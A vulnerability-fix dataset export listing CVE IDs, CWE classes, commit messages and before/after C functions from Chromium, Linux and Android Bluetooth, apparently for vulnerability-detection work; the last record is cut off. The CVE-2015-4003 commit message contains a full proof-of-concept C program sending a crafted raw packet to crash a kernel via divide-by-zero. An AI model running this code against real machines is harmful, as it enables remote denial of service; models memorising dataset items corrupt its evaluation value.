CVE ID (string, 13–43 chars, nullable) | CVE Page (string, 45–48 chars, nullable) | CWE ID (90 classes) | codeLink (string, 46–139 chars) | commit_id (string, 6–81 chars) | commit_message (string, 3–13.3k chars, nullable) | func_after (string, 14–241k chars) | func_before (string, 14–241k chars) | lang (3 classes) | project (309 classes) | vul (int8, 0–1)
---|---|---|---|---|---|---|---|---|---|---|
null | null | null |
https://github.com/chromium/chromium/commit/181c7400b2bf50ba02ac77149749fb419b4d4797
|
181c7400b2bf50ba02ac77149749fb419b4d4797
|
gpu: Use GetUniformSetup computed result size.
R=piman@chromium.org
BUG=468936
Review URL: https://codereview.chromium.org/1016193003
Cr-Commit-Position: refs/heads/master@{#321489}
|
error::Error GLES2DecoderImpl::HandleTexImage3D(uint32 immediate_data_size,
const void* cmd_data) {
if (!unsafe_es3_apis_enabled())
return error::kUnknownCommand;
const gles2::cmds::TexImage3D& c =
*static_cast<const gles2::cmds::TexImage3D*>(cmd_data);
TRACE_EVENT2("gpu", "GLES2DecoderImpl::HandleTexImage3D",
"widthXheight", c.width * c.height, "depth", c.depth);
GLenum target = static_cast<GLenum>(c.target);
GLint level = static_cast<GLint>(c.level);
GLenum internal_format = static_cast<GLenum>(c.internalformat);
GLsizei width = static_cast<GLsizei>(c.width);
GLsizei height = static_cast<GLsizei>(c.height);
GLsizei depth = static_cast<GLsizei>(c.depth);
GLint border = static_cast<GLint>(c.border);
GLenum format = static_cast<GLenum>(c.format);
GLenum type = static_cast<GLenum>(c.type);
uint32 pixels_shm_id = static_cast<uint32>(c.pixels_shm_id);
uint32 pixels_shm_offset = static_cast<uint32>(c.pixels_shm_offset);
uint32 pixels_size;
if (!GLES2Util::ComputeImageDataSizes(
width, height, depth, format, type, state_.unpack_alignment, &pixels_size,
NULL, NULL)) {
return error::kOutOfBounds;
}
const void* pixels = NULL;
if (pixels_shm_id != 0 || pixels_shm_offset != 0) {
pixels = GetSharedMemoryAs<const void*>(
pixels_shm_id, pixels_shm_offset, pixels_size);
if (!pixels) {
return error::kOutOfBounds;
}
}
glTexImage3D(target, level, internal_format, width, height, depth, border,
format, type, pixels);
ExitCommandProcessingEarly();
return error::kNoError;
}
|
error::Error GLES2DecoderImpl::HandleTexImage3D(uint32 immediate_data_size,
const void* cmd_data) {
if (!unsafe_es3_apis_enabled())
return error::kUnknownCommand;
const gles2::cmds::TexImage3D& c =
*static_cast<const gles2::cmds::TexImage3D*>(cmd_data);
TRACE_EVENT2("gpu", "GLES2DecoderImpl::HandleTexImage3D",
"widthXheight", c.width * c.height, "depth", c.depth);
GLenum target = static_cast<GLenum>(c.target);
GLint level = static_cast<GLint>(c.level);
GLenum internal_format = static_cast<GLenum>(c.internalformat);
GLsizei width = static_cast<GLsizei>(c.width);
GLsizei height = static_cast<GLsizei>(c.height);
GLsizei depth = static_cast<GLsizei>(c.depth);
GLint border = static_cast<GLint>(c.border);
GLenum format = static_cast<GLenum>(c.format);
GLenum type = static_cast<GLenum>(c.type);
uint32 pixels_shm_id = static_cast<uint32>(c.pixels_shm_id);
uint32 pixels_shm_offset = static_cast<uint32>(c.pixels_shm_offset);
uint32 pixels_size;
if (!GLES2Util::ComputeImageDataSizes(
width, height, depth, format, type, state_.unpack_alignment, &pixels_size,
NULL, NULL)) {
return error::kOutOfBounds;
}
const void* pixels = NULL;
if (pixels_shm_id != 0 || pixels_shm_offset != 0) {
pixels = GetSharedMemoryAs<const void*>(
pixels_shm_id, pixels_shm_offset, pixels_size);
if (!pixels) {
return error::kOutOfBounds;
}
}
glTexImage3D(target, level, internal_format, width, height, depth, border,
format, type, pixels);
ExitCommandProcessingEarly();
return error::kNoError;
}
|
C
|
Chrome
| 0 |
CVE-2016-8666
|
https://www.cvedetails.com/cve/CVE-2016-8666/
|
CWE-400
|
https://github.com/torvalds/linux/commit/fac8e0f579695a3ecbc4d3cac369139d7f819971
|
fac8e0f579695a3ecbc4d3cac369139d7f819971
|
tunnels: Don't apply GRO to multiple layers of encapsulation.
When drivers express support for TSO of encapsulated packets, they
only mean that they can do it for one layer of encapsulation.
Supporting additional levels would mean updating, at a minimum,
more IP length fields and they are unaware of this.
No encapsulation device expresses support for handling offloaded
encapsulated packets, so we won't generate these types of frames
in the transmit path. However, GRO doesn't have a check for
multiple levels of encapsulation and will attempt to build them.
UDP tunnel GRO actually does prevent this situation but it only
handles multiple UDP tunnels stacked on top of each other. This
generalizes that solution to prevent any kind of tunnel stacking
that would cause problems.
Fixes: bf5a755f ("net-gre-gro: Add GRE support to the GRO stack")
Signed-off-by: Jesse Gross <jesse@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
void netdev_state_change(struct net_device *dev)
{
if (dev->flags & IFF_UP) {
struct netdev_notifier_change_info change_info;
change_info.flags_changed = 0;
call_netdevice_notifiers_info(NETDEV_CHANGE, dev,
&change_info.info);
rtmsg_ifinfo(RTM_NEWLINK, dev, 0, GFP_KERNEL);
}
}
|
void netdev_state_change(struct net_device *dev)
{
if (dev->flags & IFF_UP) {
struct netdev_notifier_change_info change_info;
change_info.flags_changed = 0;
call_netdevice_notifiers_info(NETDEV_CHANGE, dev,
&change_info.info);
rtmsg_ifinfo(RTM_NEWLINK, dev, 0, GFP_KERNEL);
}
}
|
C
|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/19190765882e272a6a2162c89acdb29110f7e3cf
|
19190765882e272a6a2162c89acdb29110f7e3cf
|
Revert 102184 - [Sync] use base::Time in sync
Make EntryKernel/Entry/BaseNode use base::Time instead of int64s.
Add sync/util/time.h, with utility functions to manage the sync proto
time format.
Store times on disk in proto format instead of the local system.
This requires a database version bump (to 77).
Update SessionChangeProcessor/SessionModelAssociator
to use base::Time, too.
Remove hackish Now() function.
Remove ZeroFields() function, and instead zero-initialize in EntryKernel::EntryKernel() directly.
BUG=
TEST=
Review URL: http://codereview.chromium.org/7981006
TBR=akalin@chromium.org
Review URL: http://codereview.chromium.org/7977034
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@102186 0039d316-1c4b-4281-b951-d872f2087c98
|
int64 Get(int64 metahandle, syncable::BaseVersion field) const {
const int64 kDefaultValue = -100;
return GetField(metahandle, field, kDefaultValue);
}
|
int64 Get(int64 metahandle, syncable::BaseVersion field) const {
const int64 kDefaultValue = -100;
return GetField(metahandle, field, kDefaultValue);
}
|
C
|
Chrome
| 0 |
CVE-2014-3191
|
https://www.cvedetails.com/cve/CVE-2014-3191/
|
CWE-416
|
https://github.com/chromium/chromium/commit/11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
Defer call to updateWidgetPositions() outside of RenderLayerScrollableArea.
updateWidgetPositions() can destroy the render tree, so it should never
be called from inside RenderLayerScrollableArea. Leaving it there allows
for the potential of use-after-free bugs.
BUG=402407
R=vollick@chromium.org
Review URL: https://codereview.chromium.org/490473003
git-svn-id: svn://svn.chromium.org/blink/trunk@180681 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
bool RenderLayerScrollableArea::hitTestOverflowControls(HitTestResult& result, const IntPoint& localPoint)
{
if (!hasScrollbar() && !box().canResize())
return false;
IntRect resizeControlRect;
if (box().style()->resize() != RESIZE_NONE) {
resizeControlRect = resizerCornerRect(box().pixelSnappedBorderBoxRect(), ResizerForPointer);
if (resizeControlRect.contains(localPoint))
return true;
}
int resizeControlSize = max(resizeControlRect.height(), 0);
if (m_vBar && m_vBar->shouldParticipateInHitTesting()) {
LayoutRect vBarRect(verticalScrollbarStart(0, box().width()),
box().borderTop(),
m_vBar->width(),
box().height() - (box().borderTop() + box().borderBottom()) - (m_hBar ? m_hBar->height() : resizeControlSize));
if (vBarRect.contains(localPoint)) {
result.setScrollbar(m_vBar.get());
return true;
}
}
resizeControlSize = max(resizeControlRect.width(), 0);
if (m_hBar && m_hBar->shouldParticipateInHitTesting()) {
LayoutRect hBarRect(horizontalScrollbarStart(0),
box().height() - box().borderBottom() - m_hBar->height(),
box().width() - (box().borderLeft() + box().borderRight()) - (m_vBar ? m_vBar->width() : resizeControlSize),
m_hBar->height());
if (hBarRect.contains(localPoint)) {
result.setScrollbar(m_hBar.get());
return true;
}
}
return false;
}
|
bool RenderLayerScrollableArea::hitTestOverflowControls(HitTestResult& result, const IntPoint& localPoint)
{
if (!hasScrollbar() && !box().canResize())
return false;
IntRect resizeControlRect;
if (box().style()->resize() != RESIZE_NONE) {
resizeControlRect = resizerCornerRect(box().pixelSnappedBorderBoxRect(), ResizerForPointer);
if (resizeControlRect.contains(localPoint))
return true;
}
int resizeControlSize = max(resizeControlRect.height(), 0);
if (m_vBar && m_vBar->shouldParticipateInHitTesting()) {
LayoutRect vBarRect(verticalScrollbarStart(0, box().width()),
box().borderTop(),
m_vBar->width(),
box().height() - (box().borderTop() + box().borderBottom()) - (m_hBar ? m_hBar->height() : resizeControlSize));
if (vBarRect.contains(localPoint)) {
result.setScrollbar(m_vBar.get());
return true;
}
}
resizeControlSize = max(resizeControlRect.width(), 0);
if (m_hBar && m_hBar->shouldParticipateInHitTesting()) {
LayoutRect hBarRect(horizontalScrollbarStart(0),
box().height() - box().borderBottom() - m_hBar->height(),
box().width() - (box().borderLeft() + box().borderRight()) - (m_vBar ? m_vBar->width() : resizeControlSize),
m_hBar->height());
if (hBarRect.contains(localPoint)) {
result.setScrollbar(m_hBar.get());
return true;
}
}
return false;
}
|
C
|
Chrome
| 0 |
CVE-2019-5787
|
https://www.cvedetails.com/cve/CVE-2019-5787/
|
CWE-416
|
https://github.com/chromium/chromium/commit/6a7063ae61cf031630b48bdcdb09863ffc199962
|
6a7063ae61cf031630b48bdcdb09863ffc199962
|
Clean up CanvasResourceDispatcher on finalizer
We may have pending mojo messages after GC, so we want to drop the
dispatcher as soon as possible.
Bug: 929757,913964
Change-Id: I5789bcbb55aada4a74c67a28758f07686f8911c0
Reviewed-on: https://chromium-review.googlesource.com/c/1489175
Reviewed-by: Ken Rockot <rockot@google.com>
Commit-Queue: Ken Rockot <rockot@google.com>
Commit-Queue: Fernando Serboncini <fserb@chromium.org>
Auto-Submit: Fernando Serboncini <fserb@chromium.org>
Cr-Commit-Position: refs/heads/master@{#635833}
|
HTMLCanvasElement::CreateAccelerated2dBuffer() {
base::WeakPtr<WebGraphicsContext3DProviderWrapper> context_provider_wrapper =
SharedGpuContext::ContextProviderWrapper();
const bool needs_vertical_flip =
!(context_provider_wrapper && context_provider_wrapper->ContextProvider()
->GetCapabilities()
.mesa_framebuffer_flip_y);
auto surface = std::make_unique<Canvas2DLayerBridge>(
Size(), Canvas2DLayerBridge::kEnableAcceleration, ColorParams(),
needs_vertical_flip);
if (!surface->IsValid())
return nullptr;
if (MemoryPressureListenerRegistry::IsLowEndDevice())
surface->DisableDeferral(kDisableDeferralReasonLowEndDevice);
return surface;
}
|
HTMLCanvasElement::CreateAccelerated2dBuffer() {
base::WeakPtr<WebGraphicsContext3DProviderWrapper> context_provider_wrapper =
SharedGpuContext::ContextProviderWrapper();
const bool needs_vertical_flip =
!(context_provider_wrapper && context_provider_wrapper->ContextProvider()
->GetCapabilities()
.mesa_framebuffer_flip_y);
auto surface = std::make_unique<Canvas2DLayerBridge>(
Size(), Canvas2DLayerBridge::kEnableAcceleration, ColorParams(),
needs_vertical_flip);
if (!surface->IsValid())
return nullptr;
if (MemoryPressureListenerRegistry::IsLowEndDevice())
surface->DisableDeferral(kDisableDeferralReasonLowEndDevice);
return surface;
}
|
C
|
Chrome
| 0 |
CVE-2014-9644
|
https://www.cvedetails.com/cve/CVE-2014-9644/
|
CWE-264
|
https://github.com/torvalds/linux/commit/4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
crypto: include crypto- module prefix in template
This adds the module loading prefix "crypto-" to the template lookup
as well.
For example, attempting to load 'vfat(blowfish)' via AF_ALG now correctly
includes the "crypto-" prefix at every level, correctly rejecting "vfat":
net-pf-38
algif-hash
crypto-vfat(blowfish)
crypto-vfat(blowfish)-all
crypto-vfat
Reported-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
|
int shash_ahash_mcryptd_update(struct ahash_request *req,
struct shash_desc *desc)
{
struct crypto_shash *tfm = desc->tfm;
struct shash_alg *shash = crypto_shash_alg(tfm);
/* alignment is to be done by multi-buffer crypto algorithm if needed */
return shash->update(desc, NULL, 0);
}
|
int shash_ahash_mcryptd_update(struct ahash_request *req,
struct shash_desc *desc)
{
struct crypto_shash *tfm = desc->tfm;
struct shash_alg *shash = crypto_shash_alg(tfm);
/* alignment is to be done by multi-buffer crypto algorithm if needed */
return shash->update(desc, NULL, 0);
}
|
C
|
linux
| 0 |
CVE-2015-4003
|
https://www.cvedetails.com/cve/CVE-2015-4003/
|
CWE-189
|
https://github.com/torvalds/linux/commit/04bf464a5dfd9ade0dda918e44366c2c61fce80b
|
04bf464a5dfd9ade0dda918e44366c2c61fce80b
|
ozwpan: divide-by-zero leading to panic
A network supplied parameter was not checked before division, leading to
a divide-by-zero. Since this happens in the softirq path, it leads to a
crash. A PoC follows below, which requires the ozprotocol.h file from
this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
struct oz_elt oz_elt2;
struct oz_multiple_fixed oz_multiple_fixed;
} __packed packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 0,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
},
.oz_elt2 = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_multiple_fixed)
},
.oz_multiple_fixed = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_USB_ENDPOINT_DATA,
.endpoint = 0,
.format = OZ_DATA_F_MULTIPLE_FIXED,
.unit_size = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
|
static int oz_usb_set_clear_feature_req(void *hpd, u8 req_id, u8 type,
u8 recipient, u8 index, __le16 feature)
{
struct oz_usb_ctx *usb_ctx = hpd;
struct oz_pd *pd = usb_ctx->pd;
struct oz_elt *elt;
struct oz_elt_buf *eb = &pd->elt_buff;
struct oz_elt_info *ei = oz_elt_info_alloc(&pd->elt_buff);
struct oz_feature_req *body;
if (ei == NULL)
return -1;
elt = (struct oz_elt *)ei->data;
elt->length = sizeof(struct oz_feature_req);
body = (struct oz_feature_req *)(elt+1);
body->type = type;
body->req_id = req_id;
body->recipient = recipient;
body->index = index;
put_unaligned(feature, &body->feature);
return oz_usb_submit_elt(eb, ei, usb_ctx, 0, 0);
}
|
static int oz_usb_set_clear_feature_req(void *hpd, u8 req_id, u8 type,
u8 recipient, u8 index, __le16 feature)
{
struct oz_usb_ctx *usb_ctx = hpd;
struct oz_pd *pd = usb_ctx->pd;
struct oz_elt *elt;
struct oz_elt_buf *eb = &pd->elt_buff;
struct oz_elt_info *ei = oz_elt_info_alloc(&pd->elt_buff);
struct oz_feature_req *body;
if (ei == NULL)
return -1;
elt = (struct oz_elt *)ei->data;
elt->length = sizeof(struct oz_feature_req);
body = (struct oz_feature_req *)(elt+1);
body->type = type;
body->req_id = req_id;
body->recipient = recipient;
body->index = index;
put_unaligned(feature, &body->feature);
return oz_usb_submit_elt(eb, ei, usb_ctx, 0, 0);
}
|
C
|
linux
| 0 |
CVE-2016-0850
|
https://www.cvedetails.com/cve/CVE-2016-0850/
|
CWE-264
|
https://android.googlesource.com/platform/external/bluetooth/bluedroid/+/c677ee92595335233eb0e7b59809a1a94e7a678a
|
c677ee92595335233eb0e7b59809a1a94e7a678a
|
DO NOT MERGE Remove Porsche car-kit pairing workaround
Bug: 26551752
Change-Id: I14c5e3fcda0849874c8a94e48aeb7d09585617e1
|
tBTM_STATUS btm_sec_l2cap_access_req (BD_ADDR bd_addr, UINT16 psm, UINT16 handle,
CONNECTION_TYPE conn_type,
tBTM_SEC_CALLBACK *p_callback,
void *p_ref_data)
{
tBTM_SEC_DEV_REC *p_dev_rec;
tBTM_SEC_SERV_REC *p_serv_rec;
UINT16 security_required;
UINT16 old_security_required;
BOOLEAN old_is_originator;
tBTM_STATUS rc = BTM_SUCCESS;
BOOLEAN chk_acp_auth_done = FALSE;
BOOLEAN is_originator;
BOOLEAN transport = FALSE; /* should check PSM range in LE connection oriented L2CAP connection */
#if (L2CAP_UCD_INCLUDED == TRUE)
if (conn_type & CONNECTION_TYPE_ORIG_MASK)
is_originator = TRUE;
else
is_originator = FALSE;
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req conn_type:0x%x, 0x%x", conn_type, p_ref_data);
#else
is_originator = conn_type;
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req is_originator:%d, 0x%x", is_originator, p_ref_data);
#endif
/* Find or get oldest record */
p_dev_rec = btm_find_or_alloc_dev (bd_addr);
p_dev_rec->hci_handle = handle;
/* Find the service record for the PSM */
p_serv_rec = btm_sec_find_first_serv (conn_type, psm);
/* If there is no application registered with this PSM do not allow connection */
if (!p_serv_rec)
{
BTM_TRACE_WARNING ("btm_sec_l2cap_access_req() PSM:%d no application registerd", psm);
(*p_callback) (bd_addr, transport, p_ref_data, BTM_MODE_UNSUPPORTED);
return(BTM_MODE_UNSUPPORTED);
}
/* SDP connection we will always let through */
if (BT_PSM_SDP == psm)
{
(*p_callback) (bd_addr,transport, p_ref_data, BTM_SUCCESS_NO_SECURITY);
return(BTM_SUCCESS);
}
#if (L2CAP_UCD_INCLUDED == TRUE)
if ( conn_type & CONNECTION_TYPE_CONNLESS_MASK )
{
security_required = p_serv_rec->ucd_security_flags;
rc = BTM_CMD_STARTED;
if (is_originator)
{
if (((security_required & BTM_SEC_OUT_FLAGS) == 0) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_AUTHENTICATE) && (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT)) && (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_FLAGS) && (p_dev_rec->sec_flags & BTM_SEC_AUTHORIZED))) )
{
rc = BTM_SUCCESS;
}
}
else
{
if (((security_required & BTM_SEC_IN_FLAGS) == 0) ||
((((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHENTICATE) && (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))) ||
((((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT)) && (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED))) ||
((((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_FLAGS) && (p_dev_rec->sec_flags & BTM_SEC_AUTHORIZED))) )
{
rc = BTM_SUCCESS;
}
}
if (rc == BTM_SUCCESS)
{
if (p_callback)
(*p_callback) (bd_addr, transport, (void *)p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
else
#endif
{
security_required = p_serv_rec->security_flags;
}
/* there are some devices (moto KRZR) which connects to several services at the same time */
/* we will process one after another */
if ( (p_dev_rec->p_callback) || (btm_cb.pairing_state != BTM_PAIR_STATE_IDLE) )
{
BTM_TRACE_EVENT ("btm_sec_l2cap_access_req() - busy - PSM:%d delayed state: %s mode:%d, sm4:0x%x",
psm, btm_pair_state_descr(btm_cb.pairing_state), btm_cb.security_mode, p_dev_rec->sm4);
BTM_TRACE_EVENT ("security_flags:x%x, sec_flags:x%x", security_required, p_dev_rec->sec_flags);
rc = BTM_CMD_STARTED;
if ((BTM_SEC_MODE_SP != btm_cb.security_mode)
|| ((BTM_SEC_MODE_SP == btm_cb.security_mode) && (BTM_SM4_KNOWN == p_dev_rec->sm4))
|| (BTM_SEC_IS_SM4(p_dev_rec->sm4) && (btm_sec_is_upgrade_possible(p_dev_rec, is_originator) == FALSE))
)
{
/* legacy mode - local is legacy or local is lisbon/peer is legacy
* or SM4 with no possibility of link key upgrade */
if (is_originator)
{
if (((security_required & BTM_SEC_OUT_FLAGS) == 0) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_AUTHENTICATE) && btm_dev_authenticated(p_dev_rec))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT)) && btm_dev_encrypted(p_dev_rec))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_FLAGS) && btm_dev_authorized(p_dev_rec) && btm_dev_encrypted(p_dev_rec))) )
{
rc = BTM_SUCCESS;
}
}
else
{
if (((security_required & BTM_SEC_IN_FLAGS) == 0) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHENTICATE) && btm_dev_authenticated(p_dev_rec)) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT)) && btm_dev_encrypted(p_dev_rec)) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHORIZE) && (btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_AUTHORIZE)) && ((btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec)) && btm_dev_authenticated(p_dev_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_ENCRYPT | BTM_SEC_IN_AUTHORIZE)) && ((btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec)) && btm_dev_encrypted(p_dev_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_FLAGS) && btm_dev_encrypted(p_dev_rec) && (btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec))))
{
rc = BTM_SUCCESS;
}
}
if (rc == BTM_SUCCESS)
{
if (p_callback)
(*p_callback) (bd_addr, transport, (void *)p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
btm_cb.sec_req_pending = TRUE;
return(BTM_CMD_STARTED);
}
/* Save pointer to service record */
p_dev_rec->p_cur_service = p_serv_rec;
/* mess /w security_required in btm_sec_l2cap_access_req for Lisbon */
if (btm_cb.security_mode == BTM_SEC_MODE_SP)
{
if (is_originator)
{
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* SM4 to SM4 -> always authenticate & encrypt */
security_required |= (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT);
}
else
{
if ( !(BTM_SM4_KNOWN & p_dev_rec->sm4))
{
BTM_TRACE_DEBUG ("remote features unknown!!sec_flags:0x%x", p_dev_rec->sec_flags);
/* the remote features are not known yet */
p_dev_rec->sm4 |= BTM_SM4_REQ_PEND;
return(BTM_CMD_STARTED);
}
}
}
else
{
/* responder */
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* SM4 to SM4: the acceptor needs to make sure the authentication is already done */
chk_acp_auth_done = TRUE;
/* SM4 to SM4 -> always authenticate & encrypt */
security_required |= (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT);
}
else
{
if ( !(BTM_SM4_KNOWN & p_dev_rec->sm4))
{
BTM_TRACE_DEBUG ("(rsp) remote features unknown!!sec_flags:0x%x", p_dev_rec->sec_flags);
/* the remote features are not known yet */
p_dev_rec->sm4 |= BTM_SM4_REQ_PEND;
return(BTM_CMD_STARTED);
}
}
}
}
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req() sm4:0x%x, sec_flags:0x%x, security_required:0x%x chk:%d",
p_dev_rec->sm4, p_dev_rec->sec_flags, security_required, chk_acp_auth_done);
old_security_required = p_dev_rec->security_required;
old_is_originator = p_dev_rec->is_originator;
p_dev_rec->security_required = security_required;
p_dev_rec->p_ref_data = p_ref_data;
p_dev_rec->is_originator = is_originator;
#if (L2CAP_UCD_INCLUDED == TRUE)
if ( conn_type & CONNECTION_TYPE_CONNLESS_MASK )
p_dev_rec->is_ucd = TRUE;
else
p_dev_rec->is_ucd = FALSE;
#endif
/* If there are multiple service records used through the same PSM */
/* leave security decision for the multiplexor on the top */
#if (L2CAP_UCD_INCLUDED == TRUE)
if (((btm_sec_find_next_serv (p_serv_rec)) != NULL)
&&(!( conn_type & CONNECTION_TYPE_CONNLESS_MASK ))) /* if not UCD */
#else
if ((btm_sec_find_next_serv (p_serv_rec)) != NULL)
#endif
{
BTM_TRACE_DEBUG ("no next_serv sm4:0x%x, chk:%d", p_dev_rec->sm4, chk_acp_auth_done);
if (!BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
BTM_TRACE_EVENT ("Security Manager: l2cap_access_req PSM:%d postponed for multiplexer", psm);
/* pre-Lisbon: restore the old settings */
p_dev_rec->security_required = old_security_required;
p_dev_rec->is_originator = old_is_originator;
(*p_callback) (bd_addr, transport, p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
/* if the originator is using dynamic PSM in legacy mode, do not start any security process now.
* The layer above L2CAP needs to carry out the security requirement after L2CAP connect response is received*/
if (is_originator && (btm_cb.security_mode != BTM_SEC_MODE_SP || !BTM_SEC_IS_SM4(p_dev_rec->sm4)) && (psm >= 0x1001))
{
BTM_TRACE_EVENT ("dynamic PSM:0x%x in legacy mode - postponed for upper layer", psm);
/* restore the old settings */
p_dev_rec->security_required = old_security_required;
p_dev_rec->is_originator = old_is_originator;
(*p_callback) (bd_addr, transport, p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
if (chk_acp_auth_done)
{
BTM_TRACE_DEBUG ("(SM4 to SM4) btm_sec_l2cap_access_req rspd. authenticated: x%x, enc: x%x",
(p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED), (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED));
/* SM4, but we do not know for sure which level of security we need.
* as long as we have a link key, it's OK */
if ((0 == (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))
||(0 == (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED)))
{
rc = BTM_DELAY_CHECK;
/*
2046 may report HCI_Encryption_Change and L2C Connection Request out of sequence
